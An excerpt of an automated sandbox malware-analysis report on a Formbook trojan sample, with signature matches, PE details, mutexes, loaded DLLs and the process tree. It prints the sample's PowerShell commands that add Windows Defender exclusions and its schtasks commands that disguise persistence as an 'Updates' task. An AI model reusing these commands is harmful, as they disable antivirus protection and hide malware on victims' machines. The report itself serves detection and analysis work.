Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: String function: 0167F290 appears 103 times
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: String function: 015EB970 appears 262 times
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: String function: 01097E54 appears 96 times
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: String function: 010BEA12 appears 36 times

Source: FGGx944Qu7.exe

Static PE information: invalid certificate

Source: FGGx944Qu7.exe, 00000000.00000002.1690219272.0000000004019000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs FGGx944Qu7.exe
Source: FGGx944Qu7.exe, 00000000.00000002.1681935621.000000000130E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs FGGx944Qu7.exe
Source: FGGx944Qu7.exe, 00000000.00000002.1690219272.0000000004A0A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs FGGx944Qu7.exe
Source: FGGx944Qu7.exe, 00000000.00000002.1693048544.00000000056A0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs FGGx944Qu7.exe
Source: FGGx944Qu7.exe, 00000000.00000002.1684136801.0000000002DA0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs FGGx944Qu7.exe
Source: FGGx944Qu7.exe, 00000008.00000002.1946419926.00000000016ED000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs FGGx944Qu7.exe
Source: FGGx944Qu7.exe	Binary or memory string: OriginalFilenameQbmX.exen' vs FGGx944Qu7.exe

Source: FGGx944Qu7.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 8.2.FGGx944Qu7.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 8.2.FGGx944Qu7.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000010.00000002.2863758312.0000000003070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000010.00000002.2861231272.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.1946159228.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.1945331228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000010.00000002.2863668034.0000000003030000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.2030469230.0000000000417000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000F.00000002.2863047851.0000000004760000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.1948193173.0000000003810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: FGGx944Qu7.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: TBsjWljiCpR.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.FGGx944Qu7.exe.4cb28d0.5.raw.unpack, st1dsKfLn6u0rMPrYT.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.FGGx944Qu7.exe.4cb28d0.5.raw.unpack, st1dsKfLn6u0rMPrYT.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.FGGx944Qu7.exe.4cb28d0.5.raw.unpack, KIEnU8WvlckDlH11VR.cs	Security API names: _0020.SetAccessControl
Source: 0.2.FGGx944Qu7.exe.4cb28d0.5.raw.unpack, KIEnU8WvlckDlH11VR.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.FGGx944Qu7.exe.4cb28d0.5.raw.unpack, KIEnU8WvlckDlH11VR.cs	Security API names: _0020.AddAccessRule
Source: 0.2.FGGx944Qu7.exe.2da0000.0.raw.unpack, st1dsKfLn6u0rMPrYT.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.FGGx944Qu7.exe.2da0000.0.raw.unpack, st1dsKfLn6u0rMPrYT.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.FGGx944Qu7.exe.4c2eeb0.4.raw.unpack, st1dsKfLn6u0rMPrYT.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.FGGx944Qu7.exe.4c2eeb0.4.raw.unpack, st1dsKfLn6u0rMPrYT.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.FGGx944Qu7.exe.2da0000.0.raw.unpack, KIEnU8WvlckDlH11VR.cs	Security API names: _0020.SetAccessControl
Source: 0.2.FGGx944Qu7.exe.2da0000.0.raw.unpack, KIEnU8WvlckDlH11VR.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.FGGx944Qu7.exe.2da0000.0.raw.unpack, KIEnU8WvlckDlH11VR.cs	Security API names: _0020.AddAccessRule
Source: 0.2.FGGx944Qu7.exe.4c2eeb0.4.raw.unpack, KIEnU8WvlckDlH11VR.cs	Security API names: _0020.SetAccessControl
Source: 0.2.FGGx944Qu7.exe.4c2eeb0.4.raw.unpack, KIEnU8WvlckDlH11VR.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.FGGx944Qu7.exe.4c2eeb0.4.raw.unpack, KIEnU8WvlckDlH11VR.cs	Security API names: _0020.AddAccessRule

Source: 0.2.FGGx944Qu7.exe.304eefc.2.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.FGGx944Qu7.exe.56f0000.9.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 9.2.TBsjWljiCpR.exe.3114428.1.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.FGGx944Qu7.exe.303eee4.1.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@25/16@6/3

Source: C:\Users\user\Desktop\FGGx944Qu7.exe

File created: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Mutant created: \Sessions\1\BaseNamedObjects\JCxudnFAElK
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7416:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7480:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7872:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7352:120:WilError_03

Source: C:\Users\user\Desktop\FGGx944Qu7.exe

File created: C:\Users\user\AppData\Local\Temp\tmp1454.tmp

Jump to behavior

Source: FGGx944Qu7.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: FGGx944Qu7.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\FGGx944Qu7.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\FGGx944Qu7.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SearchProtocolHost.exe, 00000010.00000003.2407226504.0000000002D07000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000010.00000003.2407458441.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000010.00000002.2861704958.0000000002D28000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: FGGx944Qu7.exe	ReversingLabs: Detection: 62%
Source: FGGx944Qu7.exe	Virustotal: Detection: 67%

Source: C:\Users\user\Desktop\FGGx944Qu7.exe

File read: C:\Users\user\Desktop\FGGx944Qu7.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\FGGx944Qu7.exe "C:\Users\user\Desktop\FGGx944Qu7.exe"
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\FGGx944Qu7.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TBsjWljiCpR" /XML "C:\Users\user\AppData\Local\Temp\tmp1454.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process created: C:\Users\user\Desktop\FGGx944Qu7.exe "C:\Users\user\Desktop\FGGx944Qu7.exe"
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process created: C:\Users\user\Desktop\FGGx944Qu7.exe "C:\Users\user\Desktop\FGGx944Qu7.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TBsjWljiCpR" /XML "C:\Users\user\AppData\Local\Temp\tmp350B.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process created: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe "C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe"
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	Process created: C:\Windows\SysWOW64\SearchProtocolHost.exe "C:\Windows\SysWOW64\SearchProtocolHost.exe"
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\FGGx944Qu7.exe"	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe"	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TBsjWljiCpR" /XML "C:\Users\user\AppData\Local\Temp\tmp1454.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process created: C:\Users\user\Desktop\FGGx944Qu7.exe "C:\Users\user\Desktop\FGGx944Qu7.exe"	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process created: C:\Users\user\Desktop\FGGx944Qu7.exe "C:\Users\user\Desktop\FGGx944Qu7.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TBsjWljiCpR" /XML "C:\Users\user\AppData\Local\Temp\tmp350B.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process created: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe "C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe"	Jump to behavior
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	Process created: C:\Windows\SysWOW64\SearchProtocolHost.exe "C:\Windows\SysWOW64\SearchProtocolHost.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"

Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
